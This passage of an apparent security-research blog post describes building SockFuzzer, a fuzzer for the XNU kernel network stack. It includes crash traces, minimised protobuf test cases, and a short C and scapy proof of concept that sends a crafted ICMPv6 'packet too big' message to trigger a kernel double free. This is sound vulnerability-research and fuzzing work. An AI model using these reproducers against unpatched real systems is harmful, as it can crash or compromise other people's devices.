pointer as an argument. #6 0x7fe1176952f3 in Assert /source/build3/../fuzz/stubs.c:21:3 #7 0x7fe11769a110 in copyin /source/build3/../fuzz/fake_impls.c:408:3 #8 0x7fe116951a18 in __copyin_chk /source/build3/../bsd/libkern/copyio.h:47:9 #9 0x7fe116951a18 in recvfrom_nocancel /source/build3/../bsd/kern/uipc_syscalls.c:2056:11 #10 0x7fe117691a86 in recvfrom_nocancel_wrapper /source/build3/../fuzz/syscall_wrappers.c:244:10 #11 0x4e933a in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:936:9 #12 0x4e43b8 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1 --- I’ve extended the copyin specification with my fuzzer-specific semantics: when the pointer (void*)1 is passed as an address, we interpret this as a request to fetch arbitrary bytes. Otherwise, we copy directly from that virtual memory address. This way, we can begin by passing (void*)1 everywhere in the fuzz target to get as much cheap coverage as possible. Later, as we want to construct well-formed data to pass into syscalls, we build the data in the protobuf test case handler and pass a real pointer to it, allowing it to be copied. This flexibility saves us time while permitting the construction of highly-structured data inputs as we see fit. int __attribute__((warn_unused_result)) copyin(void* user_addr, void* kernel_addr, size_t nbytes) { // Address 1 means use fuzzed bytes, otherwise use real bytes. // NOTE: this does not support nested useraddr. if (user_addr != (void*)1) { memcpy(kernel_addr, user_addr, nbytes); return 0; } if (get_fuzzed_bool()) { return -1; } get_fuzzed_bytes(kernel_addr, nbytes); return 0; } --- Copyout is designed similarly. We often don’t care about the data copied out; we just care about the safety of the accesses. For that reason, we make sure to memcpy from the source buffer in all cases, using a temporary buffer when a copy to (void*)1 occurs. If the kernel copies out of bounds or from freed memory, for example, ASAN will catch it and inform us about a memory disclosure vulnerability. # Synchronization and Threads Among the many changes made to XNU’s behavior to support this project, perhaps the most extensive and invasive are the changes I made to the synchronization and threading model. Before beginning this project, I had spent over a year working on Chrome browser process research, where high level “sequences” are [preferred to using physical threads](<https://chromium.googlesource.com/chromium/src/+/master/docs/threading_and_tasks.md#prefer-sequences-to-physical-threads>). Despite a paucity of data races, Chrome still had sequence-related bugs that were triggered by randomly servicing some of the pending work in between performing synchronous IPC calls. In an exploit for a bug found by the [AppCache fuzzer](<https://source.chromium.org/chromium/chromium/src/+/master:content/browser/appcache/appcache_fuzzer.cc;l=275;drc=db9ae7941adc1d95c943accce9e0151d265fd640>), sleep calls were needed to get the asynchronous work to be completed before queueing up some more work synchronously. So I already knew that asynchronous continuation-passing style concurrency could have exploitable bugs that are easy to discover with this fuzzing approach. I suspected I could find similar bugs if I used a similar model for sockfuzzer. Because XNU uses multiple kernel threads in its networking stack, I would have to port it to a cooperative style. To do this, I provided no-op implementations for all of the thread management functions and sync primitives, and instead randomly called the work functions that would have been called by the real threads. This involved modifying code: most worker threads run in a loop, processing new work as it comes in. I modified these infinitely looping helper functions to do one iteration of work and exposed them to the fuzzer frontend. Then I called them randomly as part of the protobuf message. The main benefit of doing the project this way was improved performance and determinism. Places where the kernel could block the fuzzer were modified to return early. Overall, it was a lot simpler and easier to manage a single-threaded process. But this decision did not end up yielding as many bugs as I had hoped. For example, I suspected that interleaving garbage collection of various network-related structures with syscalls would be more effective. It did achieve the goal of removing threading-related headaches from deploying the fuzzer, but this is a serious weakness that I would like to address in future fuzzer revisions. # Randomness Randomness is another service provided by kernels to userland (e.g. /dev/random) and in-kernel services requiring it. This is easy to emulate: we can just return as many bytes as were requested from the current test case’s data_provider field. # Authentication XNU features some mechanisms (KAuth, mac checks, user checks) to determine whether a given syscall is permissible. Because of the importance and relative rarity of bugs in XNU, and my willingness to triage false positives, I decided to allow all actions by default. For example, the TCP multipath code requires a special entitlement, but disabling this functionality precludes us from finding Ian’s multipath vulnerability. Rather than fuzz only code accessible inside the app sandbox, I figured I would just triage whatever comes up and report it with the appropriate severity in mind. For example, when we create a socket, the kernel checks whether the running process is allowed to make a socket of the given domain, type, and protocol provided their KAuth credentials: static int socket_common(struct proc *p, int domain, int type, int protocol, pid_t epid, int32_t *retval, int delegate) { struct socket *so; struct fileproc *fp; int fd, error; AUDIT_ARG(socket, domain, type, protocol); #if CONFIG_MACF_SOCKET_SUBSET if ((error = mac_socket_check_create(kauth_cred_get(), domain, type, protocol)) != 0) { return error; } #endif /* MAC_SOCKET_SUBSET */ --- When we reach this function in our fuzzer, we trigger an assert crash as this functionality was stubbed. #6 0x7f58f49b53f3 in Assert /source/build3/../fuzz/stubs.c:21:3 #7 0x7f58f49ba070 in kauth_cred_get /source/build3/../fuzz/fake_impls.c:272:3 #8 0x7f58f3c70889 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:39 #9 0x7f58f3c7043a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9 #10 0x7f58f49b45e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10 #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19 --- Now, we need to implement kauth_cred_get. In this case, we return a (void*)1 pointer so that NULL checks on the value will pass (and if it turns out we need to model this correctly, we’ll crash again when the pointer is used). void* kauth_cred_get() { return (void*)1; } --- Now we crash actually checking the KAuth permissions. #6 0x7fbe9219a3f3 in Assert /source/build3/../fuzz/stubs.c:21:3 #7 0x7fbe9219f100 in mac_socket_check_create /source/build3/../fuzz/fake_impls.c:312:33 #8 0x7fbe914558a3 in socket_common /source/build3/../bsd/kern/uipc_syscalls.c:242:15 #9 0x7fbe9145543a in socket /source/build3/../bsd/kern/uipc_syscalls.c:214:9 #10 0x7fbe921995e3 in socket_wrapper /source/build3/../fuzz/syscall_wrappers.c:371:10 #11 0x4e8598 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:655:19 #12 0x4e76c2 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1 --- Now we simply return 0 and move on. int mac_socket_check_create() { return 0; } --- As you can see, we don’t always need to do a lot of work to fake functionality. We can opt for a much simpler model that still gets us the results we want. Coverage Guided Development We’ve paid a sizable initial cost to implement this fuzz target, but we’re now entering the longest and most fun stage of the project: iterating and maintaining the fuzzer. We begin by running the fuzzer continuously (in my case, I ensured it could run on ClusterFuzz). A day of work then consists of fetching the latest corpus, running a clang-coverage visualization pass over it, and viewing the report. While initially most of the work involved fixing assertion failures to get the fuzzer working, we now look for silent implementation deficiencies only visible in the coverage reports. A snippet from the report looks like the following: [![Several lines of code have a column indicating that they have been covered tens of thousands of times. Below them, you can see a switch statement for handling the parsing of IP options. Only the default case is covered approximately fifty thousand times, while the routing record options are covered 0 times.](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypy5nffIIMxqcIAkEku-SJldrsLbyXhU-th0AbxjTCf8e8hM-L4hpsxAJUbibDeaTMsiHpirbmlNqKqSa3eIdd1bJYm9HtfDoVTNbItsbu7xdZDq5gG9eK5l8qHEblS7LoyglGzTqzn_1l5XXNIBf9YOdT2JiJ2_6wiE9_Yd7KrDaM-MhERHw4myg/s658/image4.png)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjypy5nffIIMxqcIAkEku-SJldrsLbyXhU-th0AbxjTCf8e8hM-L4hpsxAJUbibDeaTMsiHpirbmlNqKqSa3eIdd1bJYm9HtfDoVTNbItsbu7xdZDq5gG9eK5l8qHEblS7LoyglGzTqzn_1l5XXNIBf9YOdT2JiJ2_6wiE9_Yd7KrDaM-MhERHw4myg/s658/image4.png>) This excerpt from IP option handling shows that we don’t support the various packets well with the current version of the fuzzer and grammar. Having this visualization is enormously helpful and necessary to succeed, as it is a source of truth about your fuzz target. By directing development work around these reports, it’s relatively easy to plan actionable and high-value tasks around the fuzzer. I like to think about improving a fuzz target by either improving “soundness” or “completeness.” Logicians probably wouldn’t be happy with how I’m loosely using these terms, but they are a good metaphor for the task. To start with, we can improve the completeness of a given fuzz target by helping it reach code that we know to be reachable based on manual review. In the above example, I would suspect very strongly that the uncovered option handling code is reachable. But despite a long fuzzing campaign, these lines are uncovered, and therefore our fuzz target is incomplete, somehow unable to generate inputs reaching these lines. There are two ways to get this needed coverage: in a top-down or bottom-up fashion. Each has its tradeoffs. The top-down way to cover this code is to improve the existing grammar or C++ code to make it possible or more likely. The bottom-up way is to modify the code in question. For example, we could replace switch (opt) with something like switch (global_fuzzed_data->ConsumeRandomEnum(valid_enums). This bottom-up approach introduces unsoundness, as maybe these enums could never have been selected at this point. But this approach has often led to interesting-looking crashes that encouraged me to revert the change and proceed with the more expensive top-down implementation. When it’s one researcher working against potentially hundreds of thousands of lines, you need tricks to prioritize your work. By placing many cheap bets, you can revert later for free and focus on the most fruitful areas. Improving soundness is the other side of the coin here. I’ve just mentioned reverting unsound changes and moving those changes out of the target code and into the grammar. But our fake objects are also simple models for how their real implementations behave. If those models are too simple or directly inaccurate, we may either miss bugs or introduce them. I’m comfortable missing some bugs as I think these simple fakes enable better coverage, and it’s a net win. But sometimes, I’ll observe a crash or failure to cover some code because of a faulty model. So improvements can often come in the form of making these fakes better. All in all, there is plenty of work that can be done at any given point. Fuzzing isn’t an all or nothing one-shot endeavor for large targets like this. This is a continuous process, and as time goes on, easy gains become harder to achieve as most bugs detectable with this approach are found, and eventually, there comes a natural stopping point. But despite working on this project for several months, it’s remarkably far from the finish line despite producing several useful bug reports. The cool thing about fuzzing in this way is that it is a bit like excavating a fossil. Each target is different; we make small changes to the fuzzer, tapping away at the target with a chisel each day and letting our coverage metrics, not our biases, reveal the path forward. # Packet Delivery I’d like to cover one example to demonstrate the value of the “bottom-up” unsound modification, as in some cases, the unsound modification is dramatically cheaper than the grammar-based one. Disabling hash checks is a well-known fuzzer-only modification when fuzzer-authors know that checksums could be trivially generated by hand. But it can also be applied in other places, such as packet delivery. When an mbuf containing a TCP packet arrives, it is handled by tcp_input. In order for almost anything meaningful to occur with this packet, it must be matched by IP address and port to an existing process control block (PCB) for that connection, as seen below. void tcp_input(struct mbuf *m, int off0) { // ... if (isipv6) { inp = in6_pcblookup_hash(&tcbinfo, &ip6->ip6_src, th->th_sport, &ip6->ip6_dst, th->th_dport, 1, m->m_pkthdr.rcvif); } else #endif /* INET6 */ inp = in_pcblookup_hash(&tcbinfo, ip->ip_src, th->th_sport, ip->ip_dst, th->th_dport, 1, m->m_pkthdr.rcvif); --- Here’s the IPv4 lookup code. Note that faddr, fport_arg, laddr, and lport_arg are all taken directly from the packet and are checked against the list of PCBs, one at a time. This means that we must guess two 4-byte integers and two 2-byte shorts to match the packet to the relevant PCB. Even coverage-guided fuzzing is going to have a hard time guessing its way through these comparisons. While eventually a match will be found, we can radically improve the odds of covering meaningful code by just flipping a coin instead of doing the comparisons. This change is extremely easy to make, as we can fetch a random boolean from the fuzzer at runtime. Looking up existing PCBs and fixing up the IP/TCP headers before sending the packets is a sounder solution, but in my testing this change didn’t introduce any regressions. Now when a vulnerability is discovered, it’s just a matter of fixing up headers to match packets to the appropriate PCB. That’s light work for a vulnerability researcher looking for a remote memory corruption bug. /* * Lookup PCB in hash list. */ struct inpcb * in_pcblookup_hash(struct inpcbinfo *pcbinfo, struct in_addr faddr, u_int fport_arg, struct in_addr laddr, u_int lport_arg, int wildcard, struct ifnet *ifp) { // ... head = &pcbinfo->ipi_hashbase[INP_PCBHASH(faddr.s_addr, lport, fport, pcbinfo->ipi_hashmask)]; LIST_FOREACH(inp, head, inp_hash) { - if (inp->inp_faddr.s_addr == faddr.s_addr && - inp->inp_laddr.s_addr == laddr.s_addr && - inp->inp_fport == fport && - inp->inp_lport == lport) { + if (!get_fuzzed_bool()) { if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) != WNT_STOPUSING) { lck_rw_done(pcbinfo->ipi_lock); return inp; --- Astute readers may have noticed that the PCBs are fetched from a hash table, so it’s not enough just to replace the check. The 4 values used in the linear search are used to calculate a PCB hash, so we have to make sure all PCBs share a single bucket, as seen in the diff below. The real kernel shouldn’t do this as lookups become O(n), but we only create a few sockets, so it’s acceptable. diff \--git a/bsd/netinet/in_pcb.h b/bsd/netinet/in_pcb.h index a5ec42ab..37f6ee50 100644 \--- a/bsd/netinet/in_pcb.h +++ b/bsd/netinet/in_pcb.h @@ -611,10 +611,9 @@ struct inpcbinfo { u_int32_t ipi_flags; }; -#define INP_PCBHASH(faddr, lport, fport, mask) \ - (((faddr) ^ ((faddr) >> 16) ^ ntohs((lport) ^ (fport))) & (mask)) -#define INP_PCBPORTHASH(lport, mask) \ - (ntohs((lport)) & (mask)) +// nedwill: let all pcbs share the same hash +#define INP_PCBHASH(faddr, lport, fport, mask) (0) +#define INP_PCBPORTHASH(lport, mask) (0) #define INP_IS_FLOW_CONTROLLED(_inp_) \ ((_inp_)->inp_flags & INP_FLOW_CONTROLLED) --- Checking Our Work: Reproducing the Sample Bugs With most of the necessary supporting code implemented, we can fuzz for a while without hitting any assertions due to unimplemented stubbed functions. At this stage, I reverted the fixes for the two inspiration bugs I mentioned at the beginning of this article. Here’s what we see shortly after we run the fuzzer with those fixes reverted: ==1633983==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00029f474 at pc 0x00000049fcb7 bp 0x7ffcddc88590 sp 0x7ffcddc87d58 WRITE of size 20 at 0x61d00029f474 thread T0 #0 0x49fcb6 in __asan_memmove /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:30:3 #1 0x7ff64bd83bd9 in __asan_bcopy fuzz/san.c:37:3 #2 0x7ff64ba9e62f in icmp_error bsd/netinet/ip_icmp.c:362:2 #3 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2 #4 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34 #5 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3 #6 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7 #7 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9 0x61d00029f474 is located 12 bytes to the left of 2048-byte region [0x61d00029f480,0x61d00029fc80) allocated by thread T0 here: #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3 #1 0x7ff64bd82b20 in mbuf_create fuzz/zalloc.c:157:45 #2 0x7ff64bd8319e in mcache_alloc fuzz/zalloc.c:187:12 #3 0x7ff64b69ae84 in m_getcl bsd/kern/uipc_mbuf.c:3962:6 #4 0x7ff64ba9e15c in icmp_error bsd/netinet/ip_icmp.c:296:7 #5 0x7ff64baaff9b in ip_dooptions bsd/netinet/ip_input.c:3577:2 #6 0x7ff64baa921b in ip_input bsd/netinet/ip_input.c:2230:34 #7 0x7ff64bd7d440 in ip_input_wrapper fuzz/backend.c:132:3 #8 0x4dbe29 in DoIpInput fuzz/net_fuzzer.cc:610:7 #9 0x4de0ef in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:720:9 --- When we inspect the test case, we see that a single raw IPv4 packet was generated to trigger this bug. This is to be expected, as the bug doesn’t require an existing connection, and looking at the stack, we can see that the test case triggered the bug in the IPv4-specific ip_input path. commands { ip_input { raw_ip4: "M\001\000I\001\000\000\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII\000\000\000\000\000III\333\333\333\333\333\333\333\333\333\333\333\333IIIIIIIIIIIIII" } } data_provider: "" --- If we fix that issue and fuzz a bit longer, we soon see another crash, this time in the MPTCP stack. This is Ian’s MPTCP vulnerability. The ASAN report looks strange though. Why is it crashing during garbage collection in mptcp_session_destroy? The original vulnerability was an OOB write, but ASAN couldn’t catch it because it corrupted memory within a struct. This is a well-known shortcoming of ASAN and similar mitigations, importantly the upcoming MTE. This means we don’t catch the bug until later, when a randomly corrupted pointer is accessed. ==1640571==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x6190000079dc in thread T0 #0 0x4a0094 in free /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3 #1 0x7fbdfc7a16b0 in _FREE fuzz/zalloc.c:293:36 #2 0x7fbdfc52b624 in mptcp_session_destroy bsd/netinet/mptcp_subr.c:742:3 #3 0x7fbdfc50c419 in mptcp_gc bsd/netinet/mptcp_subr.c:4615:3 #4 0x7fbdfc4ee052 in mp_timeout bsd/netinet/mp_pcb.c:118:16 #5 0x7fbdfc79b232 in clear_all fuzz/backend.c:83:3 #6 0x4dfd5c in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:1010:3 0x6190000079dc is located 348 bytes inside of 920-byte region [0x619000007880,0x619000007c18) allocated by thread T0 here: #0 0x4a0479 in calloc /b/s/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3 #1 0x7fbdfc7a03d4 in zalloc fuzz/zalloc.c:37:10 #2 0x7fbdfc4ee710 in mp_pcballoc bsd/netinet/mp_pcb.c:222:8 #3 0x7fbdfc53cf8a in mptcp_attach bsd/netinet/mptcp_usrreq.c:211:15 #4 0x7fbdfc53699e in mptcp_usr_attach bsd/netinet/mptcp_usrreq.c:128:10 #5 0x7fbdfc0e1647 in socreate_internal bsd/kern/uipc_socket.c:784:10 #6 0x7fbdfc0e23a4 in socreate bsd/kern/uipc_socket.c:871:9 #7 0x7fbdfc118695 in socket_common bsd/kern/uipc_syscalls.c:266:11 #8 0x7fbdfc1182d1 in socket bsd/kern/uipc_syscalls.c:214:9 #9 0x7fbdfc79a26e in socket_wrapper fuzz/syscall_wrappers.c:371:10 #10 0x4dd275 in TestOneProtoInput(Session const&) fuzz/net_fuzzer.cc:655:19 --- Here’s the protobuf input for the crashing testcase: commands { socket { domain: AF_MULTIPATH so_type: SOCK_STREAM protocol: IPPROTO_IP } } commands { connectx { socket: FD_0 endpoints { sae_srcif: IFIDX_CASE_0 sae_srcaddr { sockaddr_generic { sa_family: AF_MULTIPATH sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304" } } sae_dstaddr { sockaddr_generic { sa_family: AF_MULTIPATH sa_data: "" } } } associd: ASSOCID_CASE_0 flags: CONNECT_DATA_IDEMPOTENT flags: CONNECT_DATA_IDEMPOTENT flags: CONNECT_DATA_IDEMPOTENT } } commands { connectx { socket: FD_0 endpoints { sae_srcif: IFIDX_CASE_0 sae_dstaddr { sockaddr_generic { sa_family: AF_MULTIPATH sa_data: "" } } } associd: ASSOCID_CASE_0 flags: CONNECT_DATA_IDEMPOTENT } } commands { connectx { socket: FD_0 endpoints { sae_srcif: IFIDX_CASE_0 sae_srcaddr { sockaddr_generic { sa_family: AF_MULTIPATH sa_data: "" } } sae_dstaddr { sockaddr_generic { sa_family: AF_MULTIPATH sa_data: "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\304" } } } associd: ASSOCID_CASE_0 flags: CONNECT_DATA_IDEMPOTENT flags: CONNECT_DATA_IDEMPOTENT flags: CONNECT_DATA_AUTHENTICATED } } commands { connectx { socket: FD_0 endpoints { sae_srcif: IFIDX_CASE_0 sae_dstaddr { sockaddr_generic { sa_family: AF_MULTIPATH sa_data: "" } } } associd: ASSOCID_CASE_0 flags: CONNECT_DATA_IDEMPOTENT } } commands { close { fd: FD_8 } } commands { ioctl_real { siocsifflags { ifr_name: LO0 flags: IFF_LINK1 } } } commands { close { fd: FD_8 } } data_provider: "\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025\025" --- Hmm, that’s quite large and hard to follow. Is the bug really that complicated? We can use libFuzzer’s crash minimization feature to find out. Protobuf-based test cases simplify nicely because even large test cases are already structured, so we can randomly edit and remove nodes from the message. After about a minute of automated minimization, we end up with the test shown below. commands { socket { domain: AF_MULTIPATH so_type: SOCK_STREAM protocol: IPPROTO_IP } } commands { connectx { socket: FD_0 endpoints { sae_srcif: IFIDX_CASE_1 sae_dstaddr { sockaddr_generic { sa_family: AF_MULTIPATH sa_data: "bugmbuf_debutoeloListen_dedeloListen_dedebuloListete_debugmbuf_debutoeloListen_dedeloListen_dedebuloListeListen_dedebuloListe_dtrte" # string length 131 } } } associd: ASSOCID_CASE_0 } } data_provider: "" --- This is a lot easier to read! It appears that SockFuzzer managed to open a socket from the AF_MULTIPATH domain and called connectx on it with a sockaddr using an unexpected sa_family, in this case AF_MULTIPATH. Then the large sa_data field was used to overwrite memory. You can see some artifacts of heuristics used by the fuzzer to guess strings as “listen” and “mbuf” appear in the input. This testcase could be further simplified by modifying the sa_data to a repeated character, but I left it as is so you can see exactly what it’s like to work with the output of this fuzzer. In my experience, the protobuf-formatted syscalls and packet descriptions were highly useful for reproducing crashes and tended to work on the first attempt. I didn’t have an excellent setup for debugging on-device, so I tried to lean on the fuzzing framework as much as I could to understand issues before proceeding with the expensive process of reproducing them. In [my ](<https://googleprojectzero.blogspot.com/2019/12/sockpuppet-walkthrough-of-kernel.html>)[previous post](<https://googleprojectzero.blogspot.com/2019/12/sockpuppet-walkthrough-of-kernel.html>) describing the “SockPuppet” vulnerability, I walked through one of the newly discovered vulnerabilities, from protobuf to exploit. I’d like to share another original protobuf bug report for a remotely-triggered vulnerability I reported [here](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1976>). commands { socket { domain: AF_INET6 so_type: SOCK_RAW protocol: IPPROTO_IP } } commands { set_sock_opt { level: SOL_SOCKET name: SO_RCVBUF val: "\021\000\000\000" } } commands { set_sock_opt { level: IPPROTO_IPV6 name: IP_FW_ZERO val: "\377\377\377\377" } } commands { ip_input { tcp6_packet { ip6_hdr { ip6_hdrctl { ip6_un1_flow: 0 ip6_un1_plen: 0 ip6_un1_nxt: IPPROTO_ICMPV6 ip6_un1_hlim: 0 } ip6_src: IN6_ADDR_LOOPBACK ip6_dst: IN6_ADDR_ANY } tcp_hdr { th_sport: PORT_2 th_dport: PORT_1 th_seq: SEQ_1 th_ack: SEQ_1 th_off: 0 th_win: 0 th_sum: 0 th_urp: 0 is_pure_syn: false is_pure_ack: false } data: "\377\377\377\377\377\377\377\377\377\377\377\377q\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377" } } } data_provider: "" --- This automatically minimized test case requires some human translation to a report that’s actionable by developers who don’t have access to our fuzzing framework. The test creates a socket and sets some options before delivering a crafted ICMPv6 packet. You can see how the packet grammar we specified comes in handy. I started by transcribing the first three syscall messages directly by writing the following C program. #include <sys/socket.h> #define __APPLE_USE_RFC_3542 #include <netinet/in.h> #include <stdio.h> #include <unistd.h> int main() { int fd = socket(AF_INET6, SOCK_RAW, IPPROTO_IP); if (fd < 0) { printf("failed\n"); return 0; } int res; // This is not needed to cause a crash on macOS 10.14.6, but you can // try setting this option if you can't reproduce the issue. // int space = 1; // res = setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &space, sizeof(space)); // printf("res1: %d\n", res); int enable = 1; res = setsockopt(fd, IPPROTO_IPV6, IPV6_RECVPATHMTU, &enable, sizeof(enable)); printf("res2: %d\n", res); // Keep the socket open without terminating. while (1) { sleep(5); } close(fd); return 0; } --- With the socket open, it’s now a matter of sending a special ICMPv6 packet to trigger the bug. Using the original crash as a guide, I reviewed the code around the crashing instruction to understand which parts of the input were relevant. I discovered that sending a “packet too big” notification would reach the buggy code, so I used the [scapy](<https://scapy.net/>) library for Python to send the buggy packet locally. My kernel panicked, confirming the double free vulnerability. from scapy.all import sr1, IPv6, ICMPv6PacketTooBig, raw outer = IPv6(dst="::1") / ICMPv6PacketTooBig() / ("\x41"*40) print(raw(outer).hex()) p = sr1(outer) if p: p.show() --- Creating a working PoC from the crashing protobuf input took about an hour, thanks to the straightforward mapping from grammar to syscalls/network input and the utility of being able to debug the local crashing “kernel” using gdb. Drawbacks Any fuzzing project of this size will require design decisions that have some tradeoffs. The most obvious issue is the inability to detect race conditions. Threading bugs can be found with fuzzing but are still best left to static analysis and manual review as fuzzers can’t currently deal with the state space of interleaving threads. Maybe this will change in the future, but today it’s an issue. I accepted this problem and removed threading completely from the fuzzer; some bugs were missed by this, such as a race condition [in the bind syscall](<https://youtu.be/8cOx7vfszZU?t=366>). Another issue lies in the fact that by replacing so much functionality by hand, it’s hard to extend the fuzzer trivially to support additional attack surfaces. This is evidenced by another issue I missed in [packet filtering](<https://twitter.com/WangTielei/status/1246376070367965184>). I don’t support VFS at the moment, so I can’t access the bpf device. A syzkaller-like project would have less trouble with supporting this code since VFS would already be working. I made an explicit decision to build a simple tool that works very effectively and meticulously, but this can mean missing some low hanging fruit due to the effort involved. Per-test case determinism is an issue that I’ve solved only partially. If test cases aren’t deterministic, libFuzzer becomes less efficient as it thinks some tests are finding new coverage when they really depend on one that was run previously. To mitigate this problem, I track open file descriptors manually and run all of the garbage collection thread functions after each test case. Unfortunately, there are many ioctls that change state in the background. It’s hard to keep track of them to clean up properly but they are important enough that it’s not worth disabling them just to improve determinism. If I were working on a long-term well-resourced overhaul of the XNU network stack, I would probably make sure there’s a way to cleanly tear down the whole stack to prevent this problem. Perhaps the largest caveat of this project is its reliance on source code. Without the efficiency and productivity losses that come with binary-only research, I can study the problem more closely to the source. But I humbly admit that this approach ignores many targets and doesn’t necessarily match real attackers’ workflows. Real attackers take the shortest path they can to find an exploitable vulnerability, and often that path is through bugs found via binary-based fuzzing or reverse engineering and auditing. I intend to discover some of the best practices for fuzzing with the source and then migrate this approach to work with binaries. [Binary instrumentation](<https://github.com/googleprojectzero/TinyInst>) can assist in coverage guided fuzzing, but some of my tricks around substituting fake implementations or changing behavior to be more fuzz-friendly is a more significant burden when working with binaries. But I believe these are tractable problems, and I expect researchers can adapt some of these techniques to binary-only fuzzing efforts, even if there is additional overhead. Open Sourcing and Future Work This fuzzer is now open source on [GitHub](<https://github.com/googleprojectzero/SockFuzzer>). I invite you to study the code and improve it! I’d like to continue the development of this fuzzer semi-publicly. Some modifications that yield new vulnerabilities may need to be embargoed until relevant patches go out. Still, I hope that I can be as transparent as possible in my research. By working publicly, it may be possible to bring the original XNU project and this fuzzer closer together by sharing the efforts. I’m hoping the upstream developers can make use of this project to perform their own testing and perhaps make their own improvements to XNU to make this type of testing more accessible. There’s plenty of remaining work to improve the existing grammar, add support for new subsystems, and deal with some high-level design improvements such as adding proper threading support. An interesting property of the current fuzzer is that despite reaching coverage saturation on ClusterFuzz after many months, there is still reachable but uncovered code due to the enormous search space. This means that improvements in coverage-guided fuzzing could find new bugs. I’d like to encourage teams who perform fuzzing engine research to use this project as a baseline. If you find a bug, you can take the credit for it! I simply hope you share your improvements with me and the rest of the community. Conclusion Modern kernel development has some catching up to do. XNU and Linux suffer from some process failures that lead to [shipping](<https://www.synacktiv.com/en/publications/return-of-the-ios-sandbox-escape-lightspeeds-back-in-the-race.html>) [security](<https://www.theguardian.com/technology/2019/aug/20/apple-reopens-security-flaw-ios-iphone>) [regressions](<https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=c6c9fee35dc27362b7bac34b2fc9f5b8ace2e22c>). Kernels, perhaps the most security-critical component of operating systems, are becoming increasingly fragile as memory corruption issues become easier to discover. Implementing better mitigations is half the battle; we need better kernel unit testing to make identifying and fixing (even non-security) bugs cheaper. Since my last post, Apple has increased the frequency of its open-source releases. This is great for end-user security. The more publicly that Apple can develop XNU, the more that external contributors like myself may have a chance to contribute fixes and improvements directly. Maintaining internal branches for upcoming product launches while keeping most development open has helped Chromium and Android security, and I believe XNU’s development could follow this model. As software engineering grows as a field, our experience has shown us that open, shared, and continuous development has a real impact on software quality and stability by improving developer productivity. If you don’t invest in CI, unit testing, security reviews, and fuzzing, attackers may do that for you - and users pay the cost whether they recognize it or not.